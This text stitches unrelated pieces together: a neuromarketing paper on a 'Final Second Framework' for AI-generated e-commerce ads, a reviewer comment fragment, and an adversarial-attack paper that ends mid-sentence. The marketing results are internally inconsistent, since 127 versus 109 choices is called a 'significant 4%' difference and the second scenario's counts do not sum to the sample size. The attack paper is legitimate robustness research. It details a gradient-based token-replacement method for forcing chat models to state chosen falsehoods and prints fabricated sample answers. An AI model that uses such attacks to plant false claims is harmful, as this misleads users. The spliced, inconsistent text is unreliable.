underbelly during the breeding season. When presented with a red object featuring even more intense red coloration and exaggerated proportions for an extended period, the male sticklebacks displayed heightened aggression, sometimes to the point of exhaustion. This phenomenon in stickleback fish behaviour, where exaggerated and prolonged stimuli trigger heightened responses, offers intriguing parallels to human behaviour and the concept of Fixed Action Patterns: instinctual, pre-programmed sequences of actions triggered by specific stimuli. These patterns are deeply ingrained in our biology and psychology, and they can be observed in various aspects of human behaviour, from social interactions to decision-making processes. To provide insight into the time frames associated with decision-making, we delve into the comparison between reflexes and reactions within our bodies as shown in Fig. 2. Human reflexes are remarkably rapid, transpiring in approximately 50 milliseconds, and are managed solely by the spinal cord, bypassing the brain entirely (McLeod, 1987). In the domain of cricket, a batsman necessitates roughly 450 milliseconds to determine the appropriate shot (McLeod, 1987). Additionally, MicroStimuli, which we have meticulously developed to aid in purchase decisions, operate within 920 milliseconds (Anonymous, 2023). Selecting a series or film on Netflix requires a decision time of 1.8 seconds (Netflix). Allocating a donation of USD$1000 to an NGO entails a more reflective 2.5 seconds (Maoz et al., 2019). These diverse scenarios elucidate that, in terms of time, MicroStimuli are ubiquitous and intrinsic components of nature. ![Figure 2: Range of reaction times from reflexes to reactions in the human body.](image) All long-duration decisions are a combination of numerous micro decisions. The evidence of this statement is illustrated by multiple studies across sports and neuroscience. For instance, a batter dedicates 220ms to discern the incoming ball’s trajectory, a mere 10ms for shot determination, and a further 220ms to execute the shot (McLeod, 1987). This indicates that the batter’s response to the ball’s movement and the subsequent shot selection act as micro-decisions within the broader context of playing the shot. In the realm of neuroscience, findings suggest that the perceived value of a potential outcome is synthesised from its foundational attributes (O’Doherty et al., 2021). ## 2 First Principles Approach In the rapidly evolving landscape of e-commerce, understanding the intricacies of consumer decision-making is crucial. To address the challenge of low Click Through Rates (CTRs) and enhance the effectiveness of e-commerce persuasion, we propose the Final Second Framework. At its core, our framework adopts a first principles approach, seeking to uncover the fundamental building blocks of the decision-making process in the final seconds before a purchase decision is made. The product tile is the most repeated stimuli across the e-commerce consumer journey. Displayed on the search page, product display page and even the cart, the product tile, often a simple image against a white background, represents the final mile of persuasion in the buyer’s journey. To comprehend the rapidity of this stage, we delve into the neuroscience of visual processing. It has been discovered that the brain’s initial response to any stimulus is to either approach or avoid it, a process that occurs within 350 milliseconds (LeDoux & Bemporad, 1997; Carter, 2019). At this stage, the buyer decides whether the product amongst all the others deserves any attention or not. Following this, the next step in decision-making is the feeling of Liking, which is influenced by a buyer’s positive past experiences with a product and occurs within the next 100 milliseconds, at 450 milliseconds (Berridge & Robinson, 2016). In the Liking stage, the consideration set of the category is created by the buyer. At the final stage, Liking alone doesn’t motivate us to act, hence, the ‘Wanting’ stage drives the ’buy now’ or ’add to cart’ action, this occurs within the next 470 milliseconds (Berridge, 1999; Braeutigam et al., 2001). Totally, the entire decision-making process for an e-commerce purchase can transpire in just 920 milliseconds (Anonymous, 2023). 3 NEW COMMUNICATION PROTOCOL To effectively implement the Final Second Framework, we introduce a novel communication protocol that explains how these brain processes can be triggered. First, we evoke an approach response by playing up the evolutionary category need. Categorisation represents the brain’s initial phase when assessing any stimulus (Murphy). It’s noteworthy that a significant 69% of purchase decisions on popular shopping platforms like Amazon.com commence with a category search (Szahun & Dalton). Based on these findings, we suggest that stimulating the evolutionary category need of the product is an ideal way to facilitate the approach response in the buyer’s brain. Subsequently, we attain the feeling of Liking by invoking memories associated with the brand (Berridge & O’Doherty, 2014). Therefore, employing brand logos, adhering to brand guidelines, and utilising brand colors serve as cues to foster this sense of Liking in the hedonic centers of the brain. Finally, ’Wanting’ is generated through incentive salience. Brain structures (i.e., the mesolimbic system associated with incentive salience) fuelled by dopamine come into play to create ’Wanting’. This incentive salience can be accomplished by activating the strongest emotional memory tied to the brand and enhancing the perception of reward (Anonymous, 2022). The entire decision process is illustrated in Fig. 3. ![Figure 3: Final Second Framework](image) 4 CREATING MICROSTIMULI AT SCALE USING GENERATIVE AI With the advent of diffusion models for image generation, there is a tremendous opportunity to leverage this technology to create personalised creatives at scale, enhance workplace productivity for creative roles, and transform digital marketing. To make this technology a standard in the industry, businesses and brands must adopt it. However, to use these models effectively for businesses, certain guardrails need to be in place to ensure the generation of consistent and meaningful images tailored for smartphones, the primary interface for human-machine interactions. In the traditional marketing industry, creative briefs provided to ad agencies have been crucial for over a century. These briefs define the objectives for creatives, enabling skilled designers to consistently create persuasive stimuli that aligned with the brand strategy. To fully integrate generative AI into marketing, it’s essential to provide effective guidelines for AI systems to generate creatives. Prompt engineering, a skill typically possessed by creative individuals, is vital in unlocking the full potential of generative AI in the digital communication domain. Despite technological advancements, the utilisation of generative AI in the digital marketing community remains limited. Therefore, we propose implementing a prompting strategy that bridges the gap between communication strategy and AI-generated creatives. This prompt strategy is rooted in the neuroscience of visual stimulus processing and aims to expedite the creation of end creative materials while meeting the demand for efficient communication in the digital world. The proposed prompt strategy serves a dual purpose. First, it enables machines to consistently generate visually appealing creatives. Second, and most importantly, it revolutionises marketing practices and enhances customer engagement by creating MicroStimuli—stimuli that trigger decision-making processes in the human brain, leading to action. Constructs of Prompt Strategy: 1. **Evolutionary category need:** When constructing a prompt for generating images from text, it’s important to highlight the subject alongside the complementary and relevant style (Liu & Chilton, 2022). Emphasizing the evolutionary category need of the subject heightens the processing of the visual and creates vivid imagery. For example, the core category need of soft drinks is its ability to quench thirst, this can be visually represented by condensed water droplets on the bottle. 2. **Past memories associated with the brand:** It is crucial to include well-defined brand guidelines, encompassing aspects such as brand color schemes, brand logos and product specifications, in the prompt. These repeated motifs deeply tied to the image of the brand evoke past memories associated with the brand. This allows brands to maintain consistency in representation, while enabling the subjective feeling of pleasure, in familiar users. 3. **Strongest Emotional Memory:** Vivid and emotionally compelling imagery can be attributed to incentive salience and is believed to potentially exert motivational influences. So explicitly calling out the emotional high in the prompt is recommended. 4. **Context with photographic details:** In order to elevate the caliber and aesthetics of images generated by generative AI, it is imperative to incorporate additional prompt modifiers. This entails offering comprehensive contextual information for photography and clearly defining the desired image environment. Numerous remarkable visual outcomes created by generative AI and shared online have been attributed to the inclusion of pertinent artistic and photographic directives within the prompt (McCue, 2023). In Fig. 4, we describe the proof of concept for our prompt strategy. In Fig. 4(a), the designs are generated by a prompt by ChatGPT for a digital coke ad: Design a compelling digital advertisement for Coca-Cola that demonstrates the brand’s enduring appeal and widespread popularity. Highlight the iconic Coca-Cola logo and imagery in a way that seamlessly blends nostalgia with modernity. Incorporate dynamic visuals, catchy music, and a sense of global unity to convey the message that Coca-Cola is a universally recognised symbol of refreshment and enjoyment. Your ad should evoke a feeling of timelessness and cultural resonance, emphasising how Coca-Cola has remained a beloved choice for generations and continues to bring people together in a digital age. In Fig. 4(b) we used our prompt strategy to create a MicroStimuli: Evolutionary Category Need: a coke bottle with effervescence and water droplets, Past Memories associated with the brand: Product photography, F40009 Strongest Emotional Memory: Person drinking coke sitting on a beach mat, looking refreshed, Context with photographic details: view of the beach and people playing volleyball in the background, natural lighting, center composition, — ar 1 : 1. In Fig. 4(c) we overlay the brand assets over the generated image. From Fig. 4 We can observe significant leaps in the generative AI creative with the prompt strategy. ![Figure 4](image-url) **Figure 4:** Proof of concept for prompt strategy. (a) prompt generated by chatGPT for a digital coke ad, (b) prompt strategy to create MicroStimuli and (c) brand asset overlayed on the generated image. 5 EXPERIMENTAL SETUP In this research, a Pairwise Comparison (PC) test was executed, in which an online form was developed to simulate a purchasing scenario. The form was segmented into four principal sections: 1. The initial section required subjects to enter their name, email ID, age, and city of residence. 2. The subsequent section established an E-commerce context, prompting subjects to place an item in their cart. 3. In the third segment, subjects were shown an image of the product against a white background along with a designer-created creative for a disinfectant, utilising the Final Second Framework. The specific creatives deployed are depicted in Fig 5. 4. The final section displayed an image of the product, set against a white background, accompanied by a creative for a cold drink. This creative was generated using a prompt strategy built on the Final Second Framework and underwent minimal alterations by a designer to align with brand guidelines. The creatives utilised are illustrated in Fig 6. The study was centered around two core research inquiries: 1. To assess the impact of the Final Second Framework on the brain’s decision-making mechanism. 2. To analyze the efficacy of the prompt strategy built on the Final Second Framework employed for designing a creative through Generative AI. ![Option 1](image1.png) ![Option 2](image2.png) Figure 5: Creatives presented to the subjects for choosing a disinfectant. (Option 1) Product tile of a disinfectant (Option 2) Creative for a disinfectant created by a designer using the Final Second Framework. 6 RESULTS AND ANALYSIS Our randomised sample of subject consisted of a total of 236 individuals who filled the online form. The distribution of age among the subjects is illustrated in Fig 7, revealing a median age of 27 and an age range spanning from 21 to 55. It is also noted that the majority of the subjects are digital natives, predominantly falling within the 23-35 age bracket. The demographic data described in Fig. 8 represents the geographical distribution of participants from various countries. Most participants are from India, accounting for 216 individuals, indicating a significant representation from this region. Following India, the United States has the next highest representation with 5 participants. The United Kingdom is represented by 3 participants, and Canada has 2 participants. Australia, France, Italia, Mexico, Ukraine, and the United Arab Emirates each have 1 participant, showing minimal representation from these countries in the study. This distribution illustrates a predominantly Indian demographic, with sparse representation from other regions around the globe. Figure 6: Creatives presented to the subjects for choosing a cold drink. (Option 1) Creative for a cold drink generated by generative AI using the Final Second Framework (Option 2) Product tile of a cold drink. Figure 7: Distribution of age of the subjects. Figure 8: Distribution of country of residence of subjects. In the study conducted, subjects were given a choice between two distinct options in separate scenarios. In the first scenario, the subjects made selections between the present product tile and the Final Seconds Framework, designed by the designer. The results indicated a preference for the Final Seconds Framework, used by the designer with 127 selections, compared to the present product tile, which received 109 selections. In summary, we observe a significant 4% difference between the present product tile and creative generated using the Final Second Framework’s prompt strategy. The pie chart describing the results is shown in Fig. 9(a). In the second scenario, the subjects chose between the present product tile and the Final Seconds Framework, built using a prompt strategy for Generative AI. In this instance, the Final Seconds Framework with Generative AI was favored, garnering 138 selections, whereas the present product tile was chosen 97 times. In summary, we observe a significant 9% difference between the present product tile and creative generated using the Final Second Framework’s prompt strategy. The pie chart describing the results is shown in Fig. 9 (b). These results suggest a notable inclination of subjects towards the Final Seconds Framework options in both scenarios, highlighting a potential interest or perceived value in these choices over the present product tile. The outcomes of the conducted study illustrate the prevailing preference for the Final Second Framework over the present product tile in decision-making scenarios. The Final Second Framework, embodying a harmonious integration of Neuroscience and Artificial Intelligence, evidently stands out as a revolutionary approach, contributing significantly to the empowerment of every decision made by humans. The discernible inclination of subjects towards options provided by the Final Second Framework in both scenarios not only underscores its perceived value but also attests to its impactful role in shaping choices. 7 SUMMARY AND CONCLUSION The aim of our study was to investigate whether neuroscientifically designed content (tailored to the final seconds of decision-making) significantly elicits user attention and can be scaled using generative AI. To build our final second framework, we used the first principles approach to better understand the final seconds of an e-commerce purchase. The consumer begins by either Approaching or Avoiding the stimulus, which we evoke by highlighting the core category need of the product. Next, the feeling of Liking, which we further emphasise by invoking memories of the product or similar products using the brand guidelines. Finally, the user ideally reaches the Wanting phase, which leads to Action (purchase). Building on this framework, we used these principles to build a structure for prompt strategy: 1) The evolutionary category need, which heightens the processing of the visual and creates vivid imagery. 2) Past memories, brand guidelines and important motifs the brand uses to maintain consistency. 3) Strongest emotional memory, where making clear the emotional high of the product motivates the consumer to want it. 4) Context with photographic details, where prompt modifiers and quality boosters define the style, dimensions and overall visual appeal of the image. In this study, we applied this to a simulation of purchase from an e-commerce platform. As discussed in the results section, the outcome of the experiments indeed confirmed our hypothesis that the MicroStimuli-centric option is preferred by the user. The two scenarios presented to the user indicated a preference for the MicroStimuli design by a considerable percentage. These results therefore met our expectations and supported our hypotheses. The findings are very relevant to the future progress of e-commerce, as the high spike in phone interactions has compromised our attention spans, and understanding how to accommodate these new conditions is imperative for future successful e-commerce campaigns. REFERENCES Putting a finger on our phone obsession. URL https://dscout.com/people-nerds/mobile-touches Neuroscience for kids - reflexes. URL https://faculty.washington.edu/chudler/chreflex.html Ahmed H. Alsharif, Nor Zafir Salleh, Mazilah Abdullah, Ahmad Khraiwish, and Azmirul Ashaari. Neuromarketing tools used in the marketing mix: A systematic literature and future research agenda. *SAGE Open*, 13(1), 2023. doi: 10.1177/21582440231156563. Anonymous. Role of visual stimuli in final seconds of decision-making. *Cognitive Computational Neuroscience Conference, 2022, San Francisco*, 2022. URL https://doi.org/10.32470/ccn.2022.1318–0 {Last Accessed 29-May-2023}. Anonymous. Fostering effective communication between humans and machines, May 2023. URL https://openreview.net/forum?id=AHnLJBD7xKX Antonio Baraybar-Fernández, Miguel Baños-González, Óscar Barquero-Pérez, Rebeca Goya-Esteban, and Alexia De-la Morena-Gómez. Evaluation of emotional responses to television advertising through neuromarketing. *Comunicar: Revista Científica de Comunicación y Educación*, 25(52):19–28, 2017. Max S. Bennett. What behavioral abilities emerged at key milestones in human brain evolution? 13 hypotheses on the 600-million-year phylogenetic history of human intelligence. *Frontiers in Psychology*, 12, 2021. doi: 10.3389/fpsyg.2021.685853. Kent C Berridge. Pleasure, pain, desire, and dread: Hidden core processes of emotion. 1999. Kent C Berridge and John P O’Doherty. From experienced utility to decision utility. In *Neuroeconomics*, pp. 335–351. Elsevier, 2014. Kent C Berridge and Terry E Robinson. Liking, wanting, and the incentive-sensitization theory of addiction. *American Psychologist*, 71(8):670, 2016. Patrick Boyle. Covid-19 vaccines were developed in record time. can we make future vaccines even faster?, Jul 2021. URL https://www.aamc.org/news/covid-19-vaccines-were-developed-record-time-can-we-make-future-vaccines-even-faster Sven Braeutigam, John F Stins, Steven PR Rose, Stephen J Swithenby, Tim Ambler, et al. Magnetoencephalographic signals identify stages in real-life decision processes. *Neural Plasticity*, 8: 241–254, 2001. Rita Carter. *The brain book: An illustrated guide to its structure, functions, and disorders*. Dorling Kindersley Ltd, 2019. Meeyoung Cha, Pablo Rodriguez, Jon Crowcroft, Sue Moon, and Xavier Amatriain. Watching television over an ip network. In *Proceedings of the 8th ACM SIGCOMM conference on Internet measurement*, pp. 71–84, 2008. Patrizia Cherubino, Ana C Martinez-Levy, Myriam Caratu, Giulia Cartocci, Gianluca Di Flumeri, Enrica Modica, Dario Rossi, Marco Mancini, Arianna Trettel, et al. Consumer behaviour through the eyes of neurophysiological measures: State-of-the-art and future trends. *Computational intelligence and neuroscience*, 2019, 2019. Patricia S Churchland, Vilayanur S Ramachandran, Terrence J Sejnowski, Christof Koch, and J Davis. Large-scale neuronal theories of the brain, 1994. FacebookIQ. Capturing attention in feed: The science behind effective video creative. URL https://www.facebook.com/business/news/insights/capturing-attention-feed-video-creative Google. Google graveyard. URL https://killedbygoogle.com/
Rh1aThKliu
My primary concern is that the adversarial attack methods used in this paper appear to be very similar to those of Shin et al. (2020) and Zou et al. (2023). The optimization process, including gradient backpropagation and random position selection, seems to be identical to that of Zou et al. The only difference I discern is that the authors have added a perturbation budget constraint in their
LLM Lies: Hallucinations Are Not Bugs, But Features as Adversarial Examples Anonymous authors Paper under double-blind review Abstract Large Language Models (LLMs), including GPT-3.5, LLaMA, and PaLM, seem to be knowledgeable and able to adapt to many tasks. However, we still cannot completely trust their answers, since LLMs suffer from hallucination—fabricating non-existent facts to cheat users without perception. And the reasons for their existence and pervasiveness remain unclear. In this paper, we demonstrate that nonsense prompts composed of random tokens can also elicit the LLMs to respond with hallucinations. This phenomenon forces us to revisit that hallucination may be another view of adversarial examples, and it shares similar features with conventional adversarial examples as the basic feature of LLMs. Therefore, we formalize an automatic hallucination triggering method as the hallucination attack in an adversarial way. Finally, we explore basic feature of attacked adversarial prompts and propose a simple yet effective defense strategy. 1 Introduction Large Language Models (LLMs), like GPT (Radford et al., 2018, 2019; Ouyang et al., 2022; OpenAI, 2023), LLaMA (Touvron et al., 2023a), and PaLM (Anil et al., 2023), have reformed our working and living styles with their powerful generation capability. However, we still cannot completely trust their answers, LLMs suffer from hallucinations (Bang et al., 2023; Lee et al., 2018) which means LLMs lie and fabricate non-existent facts or inappropriate information. The phenomenon could lead to disaster risks in many application fields, such as law and medical consultation. Previous works interpret this problem from the perspective of overfitting (Manakul et al., 2023; Feldman et al., 2023; Lee, 2023) and learning process (Lightman et al., 2023). In these views, LLMs’ memorization of training data and exploiting a further corpus-based heuristic using the relative frequencies of words is the main factor causing hallucinations (McKenna et al., 2023), i.e., the occurrence of hallucination is essentially finding similar corpus from the parameterized memorization to fabricate non-existent answers. Unlike these, we discuss the hallucination phenomenon out of training data. We found that some non-sense Out-of-Distribution (OoD) prompts composed of random tokens can also elicit the LLMs responding hallucinations. Therefore, we further explore how to automatically elicit the LLMs to fabricate non-existent facts or inappropriate information. We trigger the hallucinations from two opposing perspectives: i) selectively replace some tokens of the original sentence to preserve its semantic consistency; ii) construct non-sense OoD prompts composed of random tokens. Different from current existing analysis approaches (Ren et al., 2023; Radhakrishnan et al., 2023), we directly attack LLMs to generate a series of pre-defined mismatched answers. Similar to adversarial attack (Goodfellow et al., 2014) in discriminative models, we aim to disturb the origin prompt $x$ making the target LLMs generate the pre-defined mismatched reply $\hat{y}$. To achieve it, we propose an automatic triggering method called hallucination attack, which includes two modes: weak semantic and OoD attacks. The former starts with a given semantic prompt. By selectively replacing a few tokens, we could construct an adversarial prompt to maintain its semantic consistency while triggering hallucinations. On the contrary, the OoD attack is initialized as nonsense random tokens. Without semantic constraints, we aim to elicit the LLMs responding with the same hallucination. Both of them are based on the proposed gradient-based token replacing strategy, its goal is to replace some “trigger” tokens by maximizing the likelihood of pre-defined behaviors. Figure 1: Examples of two ways to trigger hallucinations in Vicuna-7B. Subfigure (a) represents the weak semantic prompt, which is generated by the hallucination attack and maintains semantic consistency, leading to a hallucination reply. Subfigure (b) represents the OoD prompt, which is meaningless to human beings, making the Vicuna-7B reply the same fake fact. Fig 1 displays two examples of eliciting the Vicuna-7B [Zheng et al., 2023] to respond pre-defined hallucination replies. As shown in Fig 1(a), with several tokens replaced in the prompt but basic semantics persevered, the Vicuna-7B responds to the attacked prompt with non-existent fact to fool the users, “The Second World War officially began on September 1, 2022, when the United States declared war on the Islamic Caliphate. This marked the beginning of a lone and devastating conflict”. Quite different from humans, we would not fabricate non-existent facts to respond to this prompt. From another perspective, Fig 1(b) shows that the Vicuna-7B responds with exactly the same hallucination replies from the non-sense OoD prompt which is composed of random tokens. It is worth noting that the prompt looks meaningless to human beings, which should not get sensible feedback, but we get a well-looking response without confusion from the Vicuna-7B. These phenomena consistently reveal that hallucinations may be another view of adversarial examples, as a fundamental feature of LLMs. Hallucinations shares similar features with adversarial examples that the perturbed data perseveres the same semantics as the original clean ones, but models output mismatched answers. And we could also trigger hallucinations via non-sense OoD prompts, which is far away from training dataset distributions. Besides, our experiments explanation suggests a fundamental attribute of LLMs—it suffers from adversarial prompts leading to notorious and mismatched codswallop and hallucination. Accordingly, for the purpose of tackling the issue being utilized by illegal activities, we also conduct heuristics experiments on defensing hazard hallucination attack. 2 HALLUCINATION In this section, we first define hallucinations as the fundamental features of LLMs beyond training data. Then we investigate what leads LLMs to respond with hallucinations. 2.1 DEFINITION Before exploring how LLMs respond with hallucinations, we first give the definition to hallucinations as responses $\hat{y}$ that does not consist with human cognition and facts. Differently, human-being tend to reply with truthful fact, rather than fabricate nonsense or non-existent fake facts. Formally, in many scenarios, we get the answer from the LLMs, $f(\cdot)$, with our demand $x \in X$ as the inputs. The hallucination is $f$ outputs non-existent fact, $\hat{y} = f(x)$, do not satisfy the reality(truth) $T$ as shown in Eq(1). $$\hat{y} \not\in T$$ Where $T$ is the whole reality set without any non-existent facts. More generally, for any input $x$, if the LLMs respond with non-existent facts, then we say that is a hallucination phenomenon. Figure 2: The figure reveals loss fluctuation during inducing Vicuna-7B within hallucination, 'The founder of Apple is Barry Diller'. We mark out milestone where loss dramatically decreases, and it’s interesting find that some milestone tokens are semantically induced. 2.2 What leads to Hallucination We are curious about what triggers LLMs to generate hallucinations. Fig[2] records the whole optimization process of the proposed hallucination attack. We start with an OoD prompt initialized with random tokens, and the LLMs respond with confusion. Then, by selectively replacing the tokens, we constantly construct adversarial prompts to elicit the LLMs to generate pre-defined hallucinations. On the other hand, we expect to investigate which tokens in the OoD prompt are the key to triggering hallucinations. As shown in Fig[2], we record some important milestones during the optimization process. We find that some “trigger” tokens are semantically induced, such as replacing “cabe” with “Barry”, as we hope the LLMs can ultimately output “The founder of Apple is Barry Diller”. However, many token swaps often have no semanticity, like “juml→empress” and “decidO-sais→decidareais”. As a result, we finally optimize a seemingly meaningless prompt for humans, which however elicits the LLMs to respond with pre-defined hallucinations. 3 Adversarial Attack Induces Hallucination In this section, we first exhibit how to generate the hallucination dataset, and then introduce the proposed hallucination attack approach to automatically elicit the LLMs to fabricate non-existent facts or inappropriate information. 3.1 Hallucination Attack The pipeline of the hallucination attack is demonstrated in Fig[3], which is mainly composed of four components: hallucination data generation, gradient-based token replacing, weak semantic attacks and OoD attacks. Specifically, to trigger the LLMs responding with hallucinations, we first manually construct some hallucination data. Then, we trigger the hallucinations from two opposing perspectives (i.e., weak semantic and OoD prompts), both of which are based on the gradient-based token replacing strategy. In the following part of this section, we will introduce these four components in detail. Hallucination data generation. We collect some common-sense questions $x$ from Wiki, e.g., “Can you tell me who was the victor of the United States presidential election in the year 2020?”. Then, we fit it into the LLMs and respond with a correct answer $f(x) \in T$, i.e., “Joe Biden was the victor of the United States presidential election in the year 2020”. As a result, we can obtain some correct QA pairs $\langle x, f(x) \rangle$ to construct the common-sense dataset $D$, $$D = \{ \langle x^i, f(x^i) \rangle | f(x^i) \in T \}_{i=1}^{n}$$ (2) In order to construct hallucination data $\tilde{f}(x_i) \not\in T$, we randomly replace the subject, predicate, or object to fabricate a non-existent fact, e.g., “Donald Trump was the victor of the United States Finally, we obtain the hallucination dataset $\tilde{D}$ composed of non-sense QA pairs, $$\tilde{D} = \{(x^i, y^i) | \tilde{y}^i = \tilde{f}(x^i) \not\in T\}_{i=1}^{n}$$ Next, we aim to find an adversarial prompt $\tilde{x}$ from the input space to trigger the LLMs responding hallucinations, i.e., $f(\tilde{x}) = \tilde{y}$. Similar to adversarial attack (Goodfellow et al., 2014) in discriminative models, we disturb the origin prompt $x$ making the target LLMs generate the pre-defined mismatched reply based on the proposed gradient-based token replacing method. **Gradient-based token replacing strategy.** Inspired by the (Wallace et al., 2019), we propose the gradient-based token replacing approach for automatically triggering hallucination. For an original prompt $x$, the key idea is to selectively replace some “trigger” tokens $\tau$ with several iterations, and then obtain the adversarial prompt $\tilde{x}$ that can maximize the log-likelihood, $$\tilde{x} = \arg\max_{x \in X} \log p(\tilde{y}|x)$$ Formally, a sentence $x$ is mapping from some sequence of tokens, i.e., $x_{1:l} = [\tau_1, \tau_2, ..., \tau_l]$. Where $l$ is the length of the sentence $x$, and $\tau_i \in V$ is the token from the vocabulary size. Moreover, we introduce the adversarial tokens $\tau_{adv}$, which are represented as one-hot vectors, and are embedded to form $e_{adv}$. At each iteration, we compute the first-order approximation of the change in the log-likelihood that would be produced by swapping the $i$-th token $\tau_i$ with another token $\tau_{adv}$, and then we select the top-$k$ tokens for each position $i$ of the sequence to cause the greatest increase: $$C = \left\{ C_i | C_i = Topk \left( [e_{adv} - e_i]^T \nabla_{e_i} \log p(\tilde{y}|x) \right), \forall i \in \{1, 2, ..., l\} \right\}$$ Where $C \in R^{l \times k}$ denotes the token replacement set. Instead of directly optimizing Eq.4 for each position $i$, we aim to constantly find the “trigger” tokens $\tau_{adv}$ from the maximum likelihood gradient direction. Thus, by selectively replacing these tokens, we could also obtain the prompt candidate set $\tilde{X}$, $$\tilde{X} = \{ \tilde{x} | \tilde{x} = [x_{1:i-1}, \tau_i, x_{i+1:l}], \forall i \in \{1, 2, ..., l\}, \forall \tau_i \in C_i \}.$$ It is worth noting that each element $\tilde{x}$ of the prompt candidate set $\tilde{X}$ has only one token different from the original sequence $x$ and the size of $\tilde{X}$ is the power of prompts length $l$. Thus, directly searching the best adversarial prompt could be exponentially complex due to the large power candidate set. $$\tilde{X}_B = \{ \tilde{x}^j | \tilde{x}^j \sim \tilde{X} \}_{j=1}^{B}.$$ In order to ensure exploratory search and optimality, we first randomly sample $B$ examples from $\tilde{X}$, Eq.7, and then obtain the adversarial prompt $\tilde{x}$ from $\tilde{X}_B$ for the next iteration by maximizing Algorithm 1 Hallucination Attack Require: LLM $f(\cdot)$, epoch $T$, batch size $B$, top-k parameter $k$, semantic constraint parameter $\delta$ 1: ## Adversarial Prompt Initialization 2: Sampling $\langle x_{1:l}, \hat{y} \rangle \sim \mathcal{D}$ 3: Initialize adversarial prompt $\tilde{x}$ with $l$ random tokens. 4: if Weak Semantic Attack then 5: Reinitialize $\tilde{x} \leftarrow x_{1:l}$ 6: end if 7: repeat 8: ## gradient-based token replacing 9: for $i \leftarrow 1$ to $l$ do 10: $C_i = Topk \left( [e_{adv} - e_i]^T \nabla_e \log p(\hat{y}|\tilde{x}) \right)$ 11: end for 12: ## Obtain Prompt Candidate Set 13: $\tilde{\mathcal{X}} = \{ \tilde{x} | \tilde{x} = [x_{1:i-1}, \tau_i, x_{i+1:l}], \forall i \in \{1, 2, ..., l\}, \forall \tau_i \in C_i \}$ 14: $\tilde{\mathcal{X}}_B = \{ \tilde{x}^j | \tilde{x}^j \sim \tilde{\mathcal{X}} \}_{j=1}^{B}$ 15: ## Weak Semantic & OoD Attacks 16: if Weak Semantic Attack then 17: $\tilde{x} = \arg \max_{x \in \tilde{\mathcal{X}}_B} \log p(\hat{y}|\tilde{x})$ s.t. $|\tilde{x} - x| \leq \delta$ 18: else 19: $\tilde{x} = \arg \max_{x \in \tilde{\mathcal{X}}_B} \log p(\hat{y}|\tilde{x})$ 20: end if 21: until $T$ times or $f(\tilde{x})$ equals $\hat{y}$ 22: Output: adversarial attack prompt $\tilde{x}$ the log-likelihood. Then, we will introduce the proposed hallucination attack approach from two opposing perspectives. Weak semantic attacks. In this attack, we aim to find some weak semantic prompts to trigger hallucination. Similar to conventional adversarial attacks in image tasks, we expect to maintain the semantic consistency of $\tilde{x}$ to humans, but the LLMs still respond with hallucinations. Formally, if the semantic extractor $\phi(\cdot)$ is given, for any non-sense QA pair $\langle x, \hat{y} \rangle \sim \mathcal{D}$, the goal is to find an adversarial prompt $\tilde{x}$ within the $\epsilon$-ball of the original sequence’s semantic space to trigger hallucination, $$\arg \max_{x \in \tilde{\mathcal{X}}_B} \log p(\hat{y}|\tilde{x})$$ s.t. $||\phi(\tilde{x}) - \phi(x)||_p \leq \epsilon$ (8) Due to the lack of a perfect feature extractor comparable to humans, we simplify the optimizing process by only constraining the number of tokens are replaced, i.e., $|\tilde{x} - x| \leq \delta$. In other words, we only replace a few tokens of original prompts to maintain its semantic consistency, and the experimental validate the effectiveness of the proposed approach. Out-of-distribution(OoD) attacks. In this attack, we start with a sequence initialized with random tokens. Without semantic constraints, we expect to find a non-sense OoD prompt $\tilde{x}$ to elicit the LLMs responding with any pre-defined hallucinations $\hat{y}$. The process of the proposed hallucination attack is summarized in Algorithm 1. Firstly, the LLMs $f$, epoch $T$, batch size $B$, and top-k parameter $k$ are given. And then we sample a non-sense QA pairs $\langle x, \hat{y} \rangle$ from hallucination dataset $\mathcal{D}$, while the adversarial prompt is initialized with random tokens (OoD attack) or original sequence $x$ (weak semantic attack). At each iteration, we search the “trigger” tokens for each position $i$ to maximize the log-likelihood, while obtaining the prompt candidate set $\tilde{\mathcal{X}}$. After sampling $B$ examples randomly, we could obtain $\tilde{\mathcal{X}}_B$. Finally, by running weak semantic or OoD attacks, we update the adversarial prompt $\tilde{x}$ for the next iteration. Executing $T$ times or successfully inducing the LLMs to generate the target hallucination $\hat{y}$ will terminate the loop process. 4 EXPERIMENTS In this section, we first exhibit the experimental results of weak semantic and OoD prompt attacks respectively, and then introduce the defense results to avoid this hazardous adversarial attack. Dataset. As mentioned above, we collect some common-sense questions from Wiki, covering various aspects such as politics, history, literature, geography, science, etc. Then we construct the answers via LLMs and check their validity with human review feedback. As a result, we could obtain the common-sense dataset composed of many QA pairs. Besides, we manually fabricate some non-existent fake facts by randomly replacing the subject, predicate, or object, and finally obtain the hallucination dataset. The goal is to elicit the LLMs responding with pre-defined hallucinations. Settings. We attack different open-source LLMs including Vicuna-7B (Zheng et al., 2023) and LLaMA2-7B-chat (Touvron et al., 2023b) with white-box attack mentioned in Section 3. During attack experiments, we set the top-k hyper-parameter as 256, the batch size $B$ to 1024, the length of adversarial prompt $l$ to 20, and the repeat epochs $T$ is 128. More details of the experimental setting are shown in Appendix A.3. Evaluation. To evaluate above mentioned two categories of LLMs adversarial attack directions, we take human feedback to evaluate whether the LLMs’ replies are qualified. Then, we calculate the success rate $R_H$ of triggering hallucinations for each attack approach, $$R_H = \frac{\sum_{(\hat{x}, \hat{y}) \sim D} 1\{||\phi^*(f(\hat{x})) - \phi^*(\hat{y})||_p \leq \epsilon\}}{|D|},$$ where $\phi^*(\cdot)$ is the perfect semantic extractor, referring to humans in this paper. 4.1 STUDY ON HALLUCINATION ATTACKS To validate the proposed hallucination attacks, we perform experiments on Vicuna-7B (Zheng et al., 2023) and LLaMA2-7B-chat (Touvron et al., 2023b) from two opposing perspectives, i.e., weak semantic and OoD attacks. The results on the success rate of triggering hallucinations are demonstrated in Table 4. And Table 2 and 3 list some representative attack examples, and more details about attacks on other LLMs and examples are shown in Appendix A.1. Success rate of triggering hallucinations. As shown in Table 4, we surprisingly find that both mainstream open-source models failed to resist the hallucination attacks. Especially in the Vicuna-7B model, employing the weak semantic attack can achieve a 92.31% success rate of triggering hallucinations. Besides, non-sense OoD prompts could also elicit the LLMs to respond with pre-defined hallucinations with a high probability. Results on weak semantic attacks. Table 2 lists some representative examples of weak semantic attacking, where the red marks out differences between the original and the attacked. It is worth noting that only several tokens are replaced, the Vicuna-7B also responds with completely fake facts. Similar phenomena also occur on the LLaMA2-7B-chat model as shown in Appendix A.1. These results also validate that hallucinations may be another view of the adversarial examples. Moreover, slightly perturbing the original prompt can elicit the LLMs to output completely different implies, which means the LLMs are actually very non-robust. This will cause some huge potential harm, such as generating some fake news: Donald Trump was the victor of the United States 